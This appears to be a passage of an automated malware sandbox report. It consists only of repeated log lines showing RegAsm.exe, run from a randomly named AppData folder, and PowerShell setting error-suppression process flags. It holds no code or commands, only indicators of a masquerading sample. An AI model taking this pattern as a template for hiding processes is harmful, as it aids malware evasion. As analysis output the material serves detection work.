              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
